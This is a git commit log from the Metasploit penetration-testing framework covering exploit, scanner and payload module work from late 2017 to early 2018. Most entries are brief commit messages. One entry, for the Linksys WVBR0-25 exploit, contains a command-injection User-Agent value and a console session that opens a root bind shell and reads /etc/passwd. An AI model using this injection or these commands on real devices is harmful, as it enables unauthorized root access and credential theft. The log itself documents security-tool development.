090f7c8bd6
Land #9467 linux priv esc against glibc origin
2018-02-12 11:55:19 -06:00
cd7187023c
Land #9469 linux local exploit for glibc ld audit
2018-02-12 11:55:18 -06:00
32bd516e70
Land #9525 , Update mysql_hashdump for MySQL 5.7 and above
2018-02-12 11:55:17 -06:00
cd723ac86e
Add scanner for Bleichenbacher oracle (ROBOT)
2018-02-09 11:14:30 -06:00
b696665adc
Land #9478 , Improve Dup Scout BOF exploit
2018-02-08 10:25:39 -06:00
909b787a56
Land #9521 , flush pipe buffers when a process exists in mettle
2018-02-08 10:25:25 -06:00
6c350be24e
Land #9473 , new MS17-010 aux and exploit modules
2018-02-02 11:32:40 -06:00
016af01fd8
Land #9399 a linux priv esc against apport and abrt
2018-02-02 11:32:29 -06:00
ce3d5d77e4
Land #9481 , Update native DNS spoofer for Dnsruby
2018-02-02 11:32:18 -06:00
ec12d61702
Land #9354 , Debut embedded httpd server (Brother printers) DoS
2018-02-02 11:31:59 -06:00
64746d8325
Land # 9407, Add BMC Server Automation RSCD Agent RCE exploit module
...
Merge branch 'land-9407' into upstream-master
2018-02-01 11:23:59 -06:00
b7fbffa331
Land #9445 fixes for ssl labs scanner module
2018-02-01 11:23:46 -06:00
4fa68f29d9
Land #9457 , Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow
2018-02-01 11:23:26 -06:00
395320ba97
Land #9379 , Oracle Weblogic RCE exploit and documentation
2018-01-26 18:08:56 -06:00
a87ae41d81
Land #9446 , Post API fix for setuid_nmap
2018-01-26 18:08:47 -06:00
b515a582f0
Land #9424 , Add SharknAT&To external scanner
2018-01-24 17:20:03 -06:00
926ce42a01
Land #8632 , colorado ftp fixes
2018-01-24 17:13:20 -06:00
2ea9ab2625
Land #9416 , Sync Breeze Enterprise 9.5.16 Import Command buffer overflow
...
Merge branch 'land-9416' into upstream-master
2018-01-24 17:13:16 -06:00
a4022f7b8f
Land #9430 , Improve Hyper-V checkvm checks
2018-01-24 17:13:12 -06:00
a136841794
Land #9114 , Add module for Kaltura <= 13.1.0 RCE (CVE-2017-14143)
...
Merge branch 'land-9114' into upstream-master
2018-01-24 17:13:00 -06:00
d6beb94c59
Land #6611 , add native DNS to Rex, MSF mixin, sample modules
2018-01-24 17:12:52 -06:00
5ec3da843e
Land #9349 , GoAhead LD_PRELOAD CGI Module
2018-01-24 17:12:47 -06:00
294a8e0ada
Land #9413 , Expand the number of class names searched when checking for an exploitable JMX server
2018-01-24 17:12:43 -06:00
bb73d2c07e
Land #9431 , Fix owa_login to handle inserting credentials for a hostname
2018-01-24 17:12:39 -06:00
47682e3f37
Land #9404 , update module author
2018-01-24 17:12:34 -06:00
ab610f599b
Land #9442 , Remove NoMethod Rescue for cerberus_sftp_enumusers
...
Land #9442
2018-01-24 17:12:25 -06:00
10fafb62bb
Land #9436 - Fix cerberus_sftp_enumusers undefined method start for nil
...
Land #9436
Thanks Steve!
2018-01-24 17:12:16 -06:00
512192d3b0
Land #9267 , Add targets to sshexec
2018-01-24 17:12:12 -06:00
55c345418d
Land #9438 , address cmd_exec inconsistencies
2018-01-24 17:11:40 -06:00
23619431aa
update stageless python sizes
2018-01-24 17:08:51 -06:00
d6e966b079
Land #9414 , wp_admin_shell_upload - remove plugin dir after exploitation
2018-01-16 21:08:22 -06:00
e5bd36da1c
Land #9402 , NIS bootparamd domain name disclosure
2018-01-15 15:36:00 -06:00
2f9eebe28b
remove plugin dir
2018-01-15 14:48:59 +01:00
736d438813
Address second round of feedback
...
Brain fart on guard clauses when I've been using them all this time...
Updating the conditions made the ternary fall out of favor.
Changed some wording in the doc to suggest the domain name for a
particular NIS server may be different from the bootparamd client's
configuration.
2018-01-13 22:55:01 -06:00
1a8eb7bf2a
Update nis_ypserv_map after bootparam feedback
...
Yes, yes, I see the off-by-one "error." It's more accurate this way.
Basically, we want to ensure there's actually data to dump.
2018-01-13 15:40:17 -06:00
c080329ee6
Update module after feedback
...
Looks like I can't decide on certain style preferences.
Not keen on using blank?, but I've used it before. Time to commit?
Also, fail_with has been fixed for aux and post since #8643 . Use it!
2018-01-13 15:40:11 -06:00
eb8429cbd3
Revert "umlaut"
...
This reverts commit ffd7073420
2018-01-12 22:57:22 -06:00
ffd7073420
umlaut
2018-01-13 15:48:45 +11:00
1f1dc59d17
Land #9392 , python meterpreter whitespace normalization
2018-01-12 21:24:13 -06:00
2916c5ae45
Rescue Rex::Proto::SunRPC::RPCTimeout
...
Coincidentally, this also fixes the rescue in the library, since
rescuing Timeout instead of Timeout::Error does nothing.
2018-01-12 19:34:59 -06:00
0c9f1d71d3
Add NIS bootparamd domain name disclosure
2018-01-12 19:34:53 -06:00
488f27bf76
Small Typo
2018-01-12 07:05:30 -05:00
e6c4fb1dab
Land #9269 , Add a new target for Sync Breeze Enterprise GET BoF
...
Land #9269
2018-01-11 16:54:23 -06:00
f395e07fc6
Land #9269 , add new target for Sync Breeze Enterprise GET BoF
...
Land #9269
2018-01-11 16:53:02 -06:00
4b225c30fd
Land #9368 , ye olde NIS ypserv map dumper
2018-01-10 22:02:36 -06:00
f66b11f262
Nix an unneeded variable declaration
2018-01-10 20:24:02 -06:00
6510ee53bc
Land #9204 , Add exploit for Samsung SRN-1670D (CVE-2017-16524)
...
Land #9204
2018-01-10 20:15:29 -06:00
18c179a091
Update module and add documentation
...
This updates the module to pass:
* msftidy
* Ruby style guidelines
* Proper usage of Metasploit API
* Mostly other cosmetic fixes
A documentation is also added.
2018-01-10 20:13:42 -06:00
b66889ac86
Rescue additional errors and refactor code
...
https://jvns.ca/blog/2015/11/27/why-rubys-timeout-is-dangerous-and-thread-dot-raise-is-terrifying/
2018-01-10 20:11:25 -06:00
7e2c7837e5
Land #9325 , Add CVE-2017-6090 phpCollab 2.5.1 file upload exploit module
...
Land #9325
2018-01-10 17:39:50 -06:00
b1f3f471f3
Update phpcollab_upload_exec code (also module documentation)
2018-01-10 17:38:52 -06:00
dd737c3bc8
Land #9317 , remove multiple deprecated modules
...
Land #9317
The following modules are replaced by the following:
auxiliary/scanner/discovery/udp_probe
is replaced by:
auxiliary/scanner/discovery/udp_sweep
exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload
is replaced by:
exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload
exploit/windows/misc/regsvr32_applocker_bypass_server
is replaced by:
exploits/multi/script/web_delivery
2018-01-10 15:47:20 -06:00
8d77f35b16
Land #9373 , Add LabF nfsAxe FTP Client 3.7 Stack Buffer Overflow
...
Land #9373
2018-01-09 22:40:50 -06:00
25280e3319
Update labf_nfsaxe and module documentation
2018-01-09 22:39:40 -06:00
f125e13278
python meterpreter whitespace normalization
2018-01-09 16:08:52 -05:00
777e383568
Land #9377 , Add HPE iMC dbman RestoreDBase Unauthenticated RCE exploit
...
Land #9377
2018-01-09 13:56:53 -06:00
a0c9cdd73d
Land #9376 , Add HPE iMC dbman RestartDB Unauthenticated RCE exploit
...
Land #9376
2018-01-09 13:28:03 -06:00
573ee28631
Land #9378 , Detect and return on bad VNC negotiations
2018-01-09 03:46:00 -05:00
4a5a17a8e1
Add NIS ypserv map dumper
2018-01-08 14:27:53 -06:00
d138f1508c
Land #9340 , Add exploit for Commvault Remote Command Injection
...
Land #9340
2018-01-07 12:17:26 -06:00
ff1806ef5f
Update labf_nfsaxe.rb
2018-01-07 16:46:06 +00:00
a69f275a39
Update labf_nfsaxe.rb
2018-01-05 21:14:47 +00:00
c819aebc76
Add files via upload
2018-01-05 21:11:21 +00:00
e797ca4781
Add files via upload
2018-01-05 21:00:47 +00:00
aca76e2a4e
Update labf_nfsaxe.rb
2018-01-05 20:58:36 +00:00
2643acbc25
Update labf_nfsaxe.rb
2018-01-05 20:55:49 +00:00
b29710c66b
Add files via upload
2018-01-05 20:47:27 +00:00
94a1198485
Update labf_nfsaxe.rb
2018-01-05 20:41:49 +00:00
b97785c7a9
Update labf_nfsaxe.rb
2018-01-05 18:46:33 +00:00
e7946549d7
Update labf_nfsaxe.rb
2018-01-05 18:31:40 +00:00
51e5fb450f
Detect and return on bad VNC negotiations
2018-01-05 10:12:13 -06:00
006514864b
Add HPE iMC dbman RestoreDBase Unauthenticated RCE exploit
2018-01-05 11:28:48 +00:00
52a5fc9e0a
Add HPE iMC dbman RestartDB Unauthenticated RCE exploit
2018-01-05 11:28:14 +00:00
a3fb8b6619
Update labf_nfsaxe.rb
2018-01-04 20:55:38 +00:00
e5bb4bf057
Add files via upload
2018-01-04 20:26:28 +00:00
65f444ddcc
land #9362 exploit for pfsense graph injection
2018-01-04 14:35:52 -05:00
c9d6d0a7a7
-51
2018-01-04 12:25:31 -06:00
366a20a4a4
Fix #9215 , minor style nitpick
2018-01-03 23:11:51 -06:00
520e890520
Land #8581 , VMware Workstation ALSA Config File Local Privilege Escalation
2018-01-03 21:35:57 -06:00
b8dde2e650
Land #9360 , Ayukov NFTP FTP client buffer overflow vulnerability
...
Land #9360
2018-01-03 20:56:12 -06:00
04cf3017c0
Update ayukov_nftp exploit and module documentation
2018-01-03 20:52:57 -06:00
7849155347
Land #9359 , Improve DCE/RPC fault handling
2018-01-03 20:42:17 -06:00
c3f10c1d57
Land #9336 , Linksys WVBR0-25 exploit
2018-01-03 18:13:44 -06:00
a5fa63405f
Land #9206 , Add Xplico RCE exploit module
2018-01-03 16:02:51 -06:00
a98de2d9a3
Land #9358 , Support password protected key files
2018-01-03 15:12:28 -06:00
a1d43c8f33
Land #9215 , new Drupageddon vector
2018-01-03 14:45:32 -06:00
84c951cc1d
Land #8059 , Postfixadmin alias modification module
2018-01-03 14:29:49 -06:00
16d709f180
changes+filedropper
2018-01-03 14:09:30 -06:00
8f0e41e159
requested changes
2018-01-01 17:30:43 -06:00
c47d09717d
pfsense graph sploit
2018-01-01 03:18:51 -06:00
67357e316b
Update ayukov_nftp.rb
2017-12-31 17:48:23 +00:00
10b2833e7c
Update ayukov_nftp.rb
2017-12-31 17:00:17 +00:00
21717ae0a2
Create ayukov_nftp.rb
2017-12-31 15:43:16 +00:00
086f657c56
Fix early termination of auxiliary/scanner/dcerpc/hidden
...
This commit fixes an issue, where auxiliary/scanner/dcerpc/hidden terminates directly, once an endpoint can't be reached or access is denied. Instead the next endpoint in list should be checked, instead of terminating directly.
2017-12-31 14:41:33 +01:00
f2a8d68a1f
Permit encrypted SSH keys for login scanner
...
Net::SSH::KeyFactory permits loading keys using a passphrase.
The Framework SSH modules were implemented back when we had a fork
of net-ssh in our tree, and can now use functionality provided by
the upstream gem.
Update the ssh key login scanner to add a KEY_PASS datastore
OptString which is then passed to the KeyCollection class and used
in the updated :read_key method which now calls the KeyFactory to
read data and give us the appropriate String representation of the
key in the KeyCollection's cache.
A bit of cleanup performed as well, removing legacy code paths no
longer hit by the module. Shamelessly added self to authors, fair
amount of blood and sweat in the SSH subsystem over the years, hope
nobody objects.
Testing:
None yet
2017-12-31 02:53:06 -05:00
c153788424
Remove sleeps
2017-12-30 15:20:56 +00:00
7f3df74134
fixup! Adding Module for Postfixadmin CVE-2017-5930
...
Add error handling if request fails
Fix a typo in doc, add default value to doc
2017-12-30 13:04:23 +01:00
3516305517
land #9191 an exploit against HP LoadRunner magentproc
2017-12-29 16:35:43 -05:00
4dacc70b9a
slight updates to magentproc docs
2017-12-29 16:35:12 -05:00
b698095c49
slight updates to magentproc docs
2017-12-29 16:30:32 -05:00
289e887895
Adding Module for Postfixadmin CVE-2017-5930
...
This exploit allows domain admins to delete protected aliases.
It can be used to redirect aliases like abuse@domain and can aid in
further attacks.
2017-12-29 17:13:59 +01:00
8de760f1f7
Land #9348 , Only use basic auth in couchdb_enum when credentials are provided
2017-12-28 21:24:45 -06:00
e614e9b732
Land #9268 , Update DiskBoss Module (EDB 42395)
2017-12-28 16:39:26 -06:00
c2bb144d0f
Land #9302 , Implement ARD auth and add remote CVE-2017-13872 (iamroot) module
2017-12-28 14:11:26 -06:00
fad4ccece9
Only use basic auth in couchdb_enum when credentials are provided
2017-12-27 20:16:01 -06:00
bbed7db13c
Merge branch 'upstream-master' into feature/mqtt-login
2017-12-27 13:08:44 -08:00
e6de25d63b
Land #9316 Cambium modules and mixins, tx @juushya
...
These cover several of the CVEs mentioned in
https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/
2017-12-26 12:39:51 -06:00
1bb2bb9d2c
Oops, no admin in that path
2017-12-26 12:06:45 -06:00
9af88681a2
Move deprecation out 60 days
2017-12-26 11:56:47 -06:00
8b0f2214b1
few more updates
2017-12-23 03:04:11 +05:30
038119d9df
Use of get_cookies_parsed, changing dirs, marking deprecated in 2 mods, more
2017-12-23 00:14:27 +05:30
d4bc98c13f
Merge branch 'upstream-master' into feature/mqtt-login
2017-12-22 08:07:40 -08:00
ec7625af9f
Damn spaces...
2017-12-22 10:57:11 -05:00
2b33b88fa4
Damn spaces
2017-12-22 10:54:31 -05:00
e088c95a99
Module Cleanup
2017-12-22 10:51:01 -05:00
b29948412e
Correct permissions, fixing warning
2017-12-22 07:27:11 -08:00
d657a9dc53
Commvault Remote Command Injection
2017-12-22 10:04:13 -05:00
3dfb836768
Ranking upgrade and uses agent key instead of manually setting user-agent in headers
2017-12-21 23:10:26 -06:00
b31ac73996
Ensure vulnerability check cannot false positive with the power of runtime randomness
2017-12-21 22:53:46 -06:00
caae33b417
Land #9170 , Linux UDF for mysql_udf_payload
2017-12-21 20:48:24 -06:00
8c3836cc88
Removed msf/core require statement and extraneous debug message
2017-12-21 19:55:56 -06:00
a86abb0297
Implemented get_cookies_parsed
2017-12-22 05:36:36 +05:30
2ee42e1433
Adds exploit module for CVE-2017-17411
...
This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to `";<payload> #`. This can be verified against WVBR0-25 devices running firmware < 1.0.41.
Example console output:
```
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info
Name: Linksys WVBR0-25 User-Agent Command Execution
Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
Platform: Unix
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-12-13
Provided by:
HeadlessZeke
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload information:
Space: 1024
Description:
The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to
connect wireless Genie cable boxes to the Genie DVR, is vulnerable
to OS command injection in version < 1.0.41 of the web management
portal via the User-Agent header. Authentication is not required to
exploit this vulnerability.
References:
http://cvedetails.com/cve/2017-17411/
http://www.zerodayinitiative.com/advisories/ZDI-17-973
https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat)
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat)
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
id
uid=0(root) gid=0(root)
^C
Abort session 1? [y/N] y
[*] 10.0.0.104 - Command shell session 1 closed. Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
[*] 10.0.0.104:80 - Trying to access the device ...
[*] 10.0.0.104:80 - Exploiting...
[+] 10.0.0.104:80 - Command sent successfully
[*] 10.0.0.104:80 - Command output: root❌ 0:0::/:/bin/sh nobody❌ 99:99:Nobody:/:/bin/nologin sshd❌ 22:22::/var/empty:/sbin/nologin admin❌ 1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga❌ 1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
```
2017-12-21 17:44:35 -06:00
5dfb5d581a
Switch get_cookies to get_cookies_parsed
...
Am I doing it right? See #9333
2017-12-21 09:00:56 -06:00
962bc71d10
Merge branch 'feature/mqtt' into feature/mqtt-login
2017-12-20 18:58:36 -08:00
298cb16b1a
Set default USER/PASS files
2017-12-20 18:44:43 -08:00
b9af835d06
Style
2017-12-20 18:05:00 -08:00
d0b3abc14b
Better handling of MQTT endpoints which don't require authentication
...
Arguably this is working around LoginScanner's inability to provide
blank usernames AND passwords
2017-12-20 18:02:52 -08:00
24907938bb
bump payloads, various fixes
2017-12-20 16:47:37 -06:00
495c649c7d
Better printing
2017-12-20 14:40:42 -08:00
ed5f177fcd
syntax
2017-12-20 14:20:08 -08:00
e66ec85677
Set default u/p
2017-12-20 14:18:33 -08:00
5fe9dba4dd
Land #9296 , add iOS meterpreter support
2017-12-20 16:09:41 -06:00
df4f62cde9
bump to mettle 0.3.3
2017-12-20 15:58:17 -06:00
8cd7185a7f
Land #9313 , Add DirectAdmin login_scanner module
2017-12-20 15:23:24 -06:00
7f8a5d3834
improved credential reporting
2017-12-20 15:09:11 -06:00
86ce3c8781
Made suggested changes and added documentation
2017-12-20 15:54:16 -05:00
14c779b945
Fix rubocop warning
2017-12-20 12:44:27 -08:00
c817df0bbc
Add module for bruteforcing authentication on MQTT endpoints
2017-12-20 12:30:21 -08:00
7e91274796
Add module for connecting to/discovering MQTT endpoints
2017-12-20 12:29:50 -08:00
a8b845fff9
Land #9283 , Add node.js ws websocket library DoS module
2017-12-20 14:20:42 -06:00
210f137b7b
Merge branch 'upstream-master' into land-9296-
2017-12-20 12:07:53 -06:00
ce457db1e3
fixed spaces at EOL
2017-12-20 09:24:30 -05:00
d6024277fc
fixed missing quote
2017-12-20 09:03:32 -05:00
139afe45a9
Add phpCollab 2.5.1 exploit module
2017-12-20 08:36:58 -05:00
fe15ac3b82
Removed file committed by mistake
2017-12-20 08:27:18 -05:00
fd2a0d3057
Add phpCollab 2.5.1 exploit module
2017-12-20 08:22:01 -05:00
a4098803b3
Remove OSVDB reference
2017-12-20 13:10:42 +01:00
9fb445fbf0
Land #9300 , Add private data type to auxiliary scanner ftp_login and telnet_login
2017-12-20 00:30:43 -06:00
6b216f2a20
Land #9290 , Fix OverrideLHOST/LPORT with http/s Meterpreter payloads
2017-12-20 00:26:06 -06:00
216d00e39f
Use a random fname destination for /etc/passwd
2017-12-19 17:02:16 -06:00
e93282b71d
Drop calls to vprint_*
2017-12-19 16:53:02 -06:00
2dc2ac134e
Don't default verbose
2017-12-19 16:48:41 -06:00
a2c5cc0ffb
Remove old deprecated modules
2017-12-19 07:56:16 -08:00
7b386ea2c8
Fix msftidy warnings wrt Set-Cookie
2017-12-19 06:58:23 -08:00
acc6951bf3
fixed typo
2017-12-19 08:35:11 -05:00
358aca9435
apple_ios/aarch64/shell_reverse_tcp
2017-12-19 15:42:21 +08:00
9f144ce8d4
Land #9151 , mettle extension support + sniffer module
2017-12-18 21:49:40 -06:00
f0df1750de
Land #9180
...
Land @RootUp's Samsung browser SOP module
2017-12-18 17:28:03 -06:00
85350a9645
Add Rapid7 blog references
2017-12-18 17:11:47 -06:00
ae4edd65e1
Hard wrap descriptions
2017-12-18 17:03:13 -06:00
27a324237b
Initial commit for Cambium issues from @juushya
...
Note, these will trigger a bunch of WARNING msftidy messages for setting
cookies directly. This is on purpose.
2017-12-18 16:32:55 -06:00
a33ed82a40
Land #9214 , @realoriginal's update to the Cisco SMI scanner to also fetch Cisco IOS configs
2017-12-18 12:22:26 -08:00
2a94a4417a
bump payloads
2017-12-18 10:01:10 -06:00
6d565b6c33
added author information
2017-12-18 09:18:36 -05:00
e9b9c80841
Fix #9307 , credit to @r0610205
2017-12-18 03:55:01 -06:00
76823e9fe6
Land #9183 , Jenkins Groovy XStream RCE
2017-12-18 03:38:27 -06:00
d3638d0487
Land #9154 , Tuleap PHP object injection exploit
2017-12-18 03:19:42 -06:00
0e2a158abd
Fix global var $is_check (make ivar @is_check)
2017-12-18 03:15:33 -06:00
f447fa1a12
Added DirectAdmin Login Utillity
2017-12-17 22:43:37 -05:00
880a1d4283
Land #9312 , Module acting as a Pyrotechnical Device Deployment Tool (PDT) for Hardware Bridge
2017-12-17 18:32:28 -06:00
8344401484
Add docs, minor tweaks.
2017-12-17 18:15:49 -06:00
917dd8e846
Update samsung_browser_sop_bypass.rb
2017-12-16 22:10:02 +05:30
8f91377acb
Update samsung_browser_sop_bypass.rb
2017-12-16 22:09:21 +05:30
3b3b0e6e96
And this is why I hate using single quotes
...
Also, restored the store_cred call.
This will fix up RootUp/metasploit-framework#3 for PR #9180
2017-12-14 14:28:25 -06:00
0b3a5567a4
Add module for CVE-2017-13872 iamroot remote exploit via ARD (VNC)
2017-12-14 13:59:35 -06:00
048b39ccd6
Initial commit of pdt module.
2017-12-14 09:23:21 -06:00
384b250659
Add credential data type
...
Added credential data type so that successful passwords are stored in the database and accessible via the creds command.
2017-12-14 08:07:59 -06:00
be4939b56a
Add credential data type
...
Added credential data type so a successful ftp login stores the password in the database to be accessed later by the creds command.
2017-12-14 08:05:57 -06:00
3cd287ddd6
Update the MS17-010 scanner to use dcerpc_getarch
2017-12-14 02:08:30 -06:00
8e4b007edc
Move verify_arch to dcerpc_getarch
...
We can use this code elsewhere, such as the MS17-010 scanner.
2017-12-14 02:08:25 -06:00
c6a2ae2551
Land #9248 , Add wd_mycloud_multiupload_upload exploit
2017-12-13 18:51:02 -06:00
125a079fa9
add cve reference
2017-12-13 18:50:21 -06:00
d7ad443be1
Merge branch 'master' of https://github.com/rapid7/metasploit-framework into upstream-master
2017-12-13 19:33:05 -05:00
c0a534140d
Land #9284 a regex dos for ua_parser_js npm module
2017-12-13 19:31:49 -05:00
deacebc46b
Land #9264 , Add private type when storing SSH password
...
Land #9264
2017-12-13 18:24:31 -06:00
5226181d6d
Better conditionals from @bcoles
2017-12-13 16:48:05 -06:00
966060d470
Nits picked by @bcoles: commas, quotes, and <head>
2017-12-13 16:38:17 -06:00
dd5532c5de
Addressing Formatting Issues
...
There were several formatting and layout issues
that are fixed in this commit. Also changing
`RHOSTS` to `RHOST`.
2017-12-13 14:26:27 -06:00
b99663fb6c
Bring #9282 up to date with upstream-master
2017-12-13 13:16:30 -06:00
37514eec17
Land #9234 , Add exploit for ClickJacking vuln for pfSense
...
Land #9234
2017-12-12 14:56:21 -06:00
c7019e5aee
Only load files once
2017-12-12 14:54:49 -06:00
622050ddfc
Oops, leftover comment
2017-12-12 14:48:00 -06:00
efa46efb48
Actually save creds, or fail through sanely
...
This incidentally also allows for a custom collector to be implemented
by the user -- for example, if they'd rather pick up a session ID or
inject a browser hook or something along those lines. It's a little
clunky, using the advanced option of CUSTOM_JS, but it seems to work
fine.
2017-12-12 14:06:18 -06:00
6149f51273
Land #9256 , Add aux module to discover WSDD enabled devices
...
Land #9256
2017-12-12 11:55:42 -06:00
c4e20e01e3
iOS meterpreter
2017-12-12 23:23:21 +08:00
5f70199218
Update samsung_browser_sop_bypass.rb
2017-12-12 15:52:55 +05:30
3f6846c332
update payloads with python retry fix
2017-12-12 03:13:38 -06:00
b335cacfc1
Update wp_slideshowgallery_upload.rb
...
Variable on line 67 needs to be changed to "user" from "username" which was undefined and causing error during exploit execution.
[-] Exploit failed: NameError undefined local variable or method `username' for #<Msf::Modules::Mod6578706c6f69742f756e69782f7765626170702f77705f736c69646573686f7767616c6c6572795f75706c6f6164::MetasploitModule:0x0055c61ab093f8>
After changing the incorrect variable name from "username" to "user", the exploit completes.
2017-12-12 00:33:28 -05:00
d79b0ad981
Land #9286 , Advantech WebAccess webvrpcs BOF RCE
2017-12-12 00:25:56 -05:00
e7a2dd2e71
fixed email
2017-12-11 23:20:46 -06:00
26e2eb8f1a
Changed to good ranking
2017-12-11 23:14:36 -06:00
9a6c54840b
Minor tweak to use vprint...
2017-12-11 16:48:47 -06:00
2d23054a1f
Changes as per comments
...
A few things were changed as per the PR comments:
1) The module title was reworded
2) The module description was multi-lined
3) Negative logic was rewritten to use 'unless'
4) Strings which did not require interpolation were rewritten
5) Documentation markdown was added.
2017-12-11 14:11:40 -06:00
f8977ed72c
added some fixes
2017-12-11 11:34:17 -06:00
c5f218c84c
Addressing comments
...
1. Updated documentation
2. Made the Sec-WebSocket-Key header a random value
2017-12-11 11:49:31 -05:00
e91830efe7
Add Dup Scout Enterprise login buffer overflow
2017-12-09 02:20:05 -06:00
cba5c7cb0f
Rename to actually call out the browser name
2017-12-08 13:53:13 -06:00
0a9dcafb77
Actually collect the creds, sort of
...
Instead of an alert() (which the attacker won't see), this collects the
offered credentials in a POST action, and displays them in the console.
This should further store the creds somewhere handy, but this is good
enough for now for testing from @RootUp
2017-12-08 13:51:02 -06:00
aee883a706
Fixed up description to be descriptive
2017-12-08 12:24:58 -06:00
604b949e23
Updated per review comments.
2017-12-08 10:42:43 -06:00
34ef650b0d
fixed up msftidy, opps.
2017-12-07 17:03:39 -06:00
75a82b3fe7
Advantech WebAccess webvrpcs ViewDll1 Stack-based Buffer Overflow Remote Code Execution Vulnerability
2017-12-07 16:34:26 -06:00
5a81f8091d
change some options for somethinf for sensible
2017-12-07 14:44:36 -05:00
335cc13cab
remove option, advanced Message seems to break it.
2017-12-07 14:17:14 -05:00
7bdc99a153
Fix HANDLER + some default options!
2017-12-07 13:53:39 -05:00
306c5d20d9
Adding ua_parser_js ReDoS Module
...
"ua-parser-js" is an npm module for parsing browser
user-agent strings. Vulnerable version of this module
have a problematic regular expression that can be exploited
to cause the entire application processing thread to "pause"
as it tries to apply the regular expression to the input.
This is problematic for single-threaded application environments
such as nodejs. The end result is a denial of service
condition for vulnerable applications, where no further
requests can be processed.
2017-12-07 10:25:29 -06:00
c992837f0d
Adding ws DoS module
...
This module verifies if ws is vulnerable
to DoS by sending a request to the server
containing a specific header value.
ws is a npm module which handles websockets.
2017-12-07 10:45:57 -05:00
09aa433fdc
Add MESSAGE field for "obfuscation"
2017-12-07 08:04:31 -05:00
8bb6a8f47c
Rename office_dde_delivery to office_dde_delivery.rb
2017-12-06 22:40:37 -05:00
9d11c60d88
Office DDE Payload Delivery
...
Generate / Inject existing RTF files with DDE Payloads!
2017-12-06 21:41:00 -05:00
adba277be0
axe errant spaces at EOL
2017-12-04 16:57:48 -08:00
69b01d26bb
Land #9226 , Microsoft Office OLE object memory corruption
2017-12-04 16:50:27 -08:00
19b37c7070
Land #9263 , drb_remote_codeexec fixes
...
See pull requests #7531 and #7749 for hysterical raisins.
2017-12-04 18:45:03 -06:00
b13f4e25e1
thanks for making this well-known
2017-12-04 18:32:31 -06:00
a27bb38d51
add authors
2017-12-04 18:25:18 -06:00
b96dac28d5
fix info segment
2017-12-04 16:42:41 -05:00
f83e9815dd
Land #9210 , Add a Polycom HDX RCE
2017-12-04 12:49:35 -06:00
7edab268f5
handle case-insensitive password, fix received
2017-12-04 12:47:40 -06:00
06334aa2bd
Update polycom_hdx_traceroute_exec.rb
2017-12-04 11:05:01 -05:00
942e44ceae
Added local copies of the static content
2017-12-02 10:14:14 +01:00
4cbb5f2619
added new target
2017-12-01 18:35:45 -06:00
c79186593a
Update DiskBoss Module (EDB 42395)
...
Added a new target option for the
DiskBoss Server.
2017-12-01 15:08:57 -06:00
c788e4e540
Update office_ms17_11882.rb
2017-12-01 11:36:03 -05:00
7df46b33e8
disassembly ASM
2017-12-01 08:03:56 -05:00
1ced3994b0
Added more reference urls to wd_mycloud_multiupload_upload module.
2017-11-30 12:53:33 -06:00
b24f70c7c6
Update ssh_login.rb
...
Added credential data type so password is stored in creds.
2017-11-30 11:02:06 -06:00
c288dab338
fixup RHOST/RPORT expectations if only URI is set
2017-11-30 10:51:02 -06:00
d689b33d7e
more error handling, deal with user error
2017-11-30 08:31:13 -06:00
87e683c763
add back kill syscall for trap method
2017-11-30 08:12:15 -06:00
a0e0e1db15
allow manual targeting, handle errors better
2017-11-30 07:51:12 -06:00
eea72663b3
warn on method failure instead of error
2017-11-30 06:37:21 -06:00
9f12b794da
cleanup comments
2017-11-30 06:37:04 -06:00
5da34e8f2b
support RHOST/RPORT
2017-11-30 06:36:42 -06:00
59580195b4
resurrect old methods, try all 3
2017-11-30 06:16:05 -06:00
51a18b68fe
Land #9211 , handle 2016 DC's with hashdump gracefully
2017-11-29 17:26:33 -06:00
283b7c5145
Add WS-Discovery Information Discovery module
2017-11-29 12:21:22 +00:00
58897bf2fc
msftidy
2017-11-29 16:36:50 +08:00
7f1f7281f1
add local exploit for osx root login with no password
2017-11-29 16:06:02 +08:00
676a08b849
Update polycom_hdx_traceroute_exec.rb
2017-11-28 22:01:41 -05:00
2544b4d8db
Change target name
2017-11-28 21:39:04 -05:00
cb7f173811
Update office_ms17_11882.rb
